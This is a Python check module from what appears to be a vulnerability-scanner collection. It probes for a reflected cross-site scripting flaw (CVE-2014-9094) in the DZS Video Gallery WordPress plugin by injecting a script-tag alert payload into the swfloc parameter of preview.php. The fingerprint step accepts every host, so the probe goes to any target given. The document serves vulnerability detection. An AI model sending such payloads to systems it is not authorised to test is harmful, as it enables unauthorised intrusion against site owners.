CVE-2014-9094.py
import requests
# Vuln Base Info
def info():
    """Return the static metadata record describing this check.

    A new dict is built on every call. The CVSS and CWE fields and the
    ``vuln-target`` entry are empty strings in this module.
    """
    classification = {
        "cvss-metrics": "",
        "cvss-score": "",
        "cve-id": "CVE-2014-9094",
        "cwe-id": "",
    }
    summary = (
        "Multiple cross-site scripting vulnerabilities in "
        "deploy/designer/preview.php in the Digital Zoom Studio (DZS) Video "
        "Gallery plugin for WordPress allow remote attackers to inject "
        "arbitrary web script or HTML via the (1) swfloc or (2) designrand "
        "parameter."
    )
    record = dict(
        author="cckuailong",
        name="WordPress DZS-VideoGallery Plugin Reflected Cross-Site Scripting",
        description=summary,
        severity="medium",
        references=["https://nvd.nist.gov/vuln/detail/CVE-2014-9094"],
        classification=classification,
        metadata={"vuln-target": ""},
        tags=["cve", "cve2014", "wordpress", "xss", "wp-plugin"],
    )
    return record
# Vendor Fingerprint
def fingerprint(url):
    """Report whether ``url`` matches the product this check targets.

    No fingerprinting is implemented here: ``url`` is ignored and every
    target is accepted.
    """
    # NOTE(review): if the caller gates poc() on this result, the probe is
    # sent to every host, WordPress or not -- confirm against the caller.
    return True
# Proof of Concept
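def poc(url):
    """Check whether preview.php reflects the ``swfloc`` probe unescaped.

    Sends one GET request to the plugin's ``deploy/designer/preview.php``
    and reports a finding only when the response is a 200, is served as
    HTML, and contains the probe's script tag verbatim.

    Args:
        url: Target base URL or bare host; normalised by ``format_url``.

    Returns:
        ``{"success": True, "info": ..., "payload": ...}`` on a match,
        ``{"success": False}`` if the request or parsing raised, and an
        empty dict when the request succeeded but nothing matched.
    """
    result = {}
    try:
        url = format_url(url)
        path = '/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E'
        # NOTE(review): verify=False disables TLS certificate validation, so
        # the responding host is not authenticated and urllib3 will warn.
        resp = requests.get(url + path, timeout=10, verify=False, allow_redirects=False)
        # Inspect the Content-Type header itself rather than the stringified
        # header dict: a reflection served as anything but HTML is not
        # rendered as markup, and "text/html" elsewhere in the headers
        # (for example in a Link header) must not count as a match.
        content_type = resp.headers.get("Content-Type", "").lower()
        reflected = "<script>alert(1)</script>" in resp.text
        if resp.status_code == 200 and reflected and "text/html" in content_type:
            result["success"] = True
            result["info"] = info()
            result["payload"] = url + path
    except Exception:
        # Narrowed from a bare except so KeyboardInterrupt and SystemExit
        # still propagate and a running scan can be stopped.
        result["success"] = False
    # NOTE(review): the no-match path returns {} with no "success" key;
    # callers presumably use result.get("success") -- confirm.
    return result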
# Exploit; may be the same as poc()
def exp(url):
    """Exploit entry point; delegates to ``poc`` and returns its result as is."""
    outcome = poc(url)
    return outcome
# Utils
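def format_url(url):
    """Normalise a target into a base URL with a scheme and no trailing slash.

    Surrounding whitespace is stripped, ``http://`` is prepended when no
    HTTP(S) scheme is present, and trailing slashes are removed.

    Args:
        url: Target as a URL or bare host, e.g. ``"example.com/"``.

    Returns:
        The normalised URL string.
    """
    url = url.strip()
    # URL schemes are case-insensitive; compare on a lowered copy so that
    # "HTTP://host" is not turned into "http://HTTP://host".
    if not url.lower().startswith(('http://', 'https://')):
        url = 'http://' + url
    return url.rstrip('/')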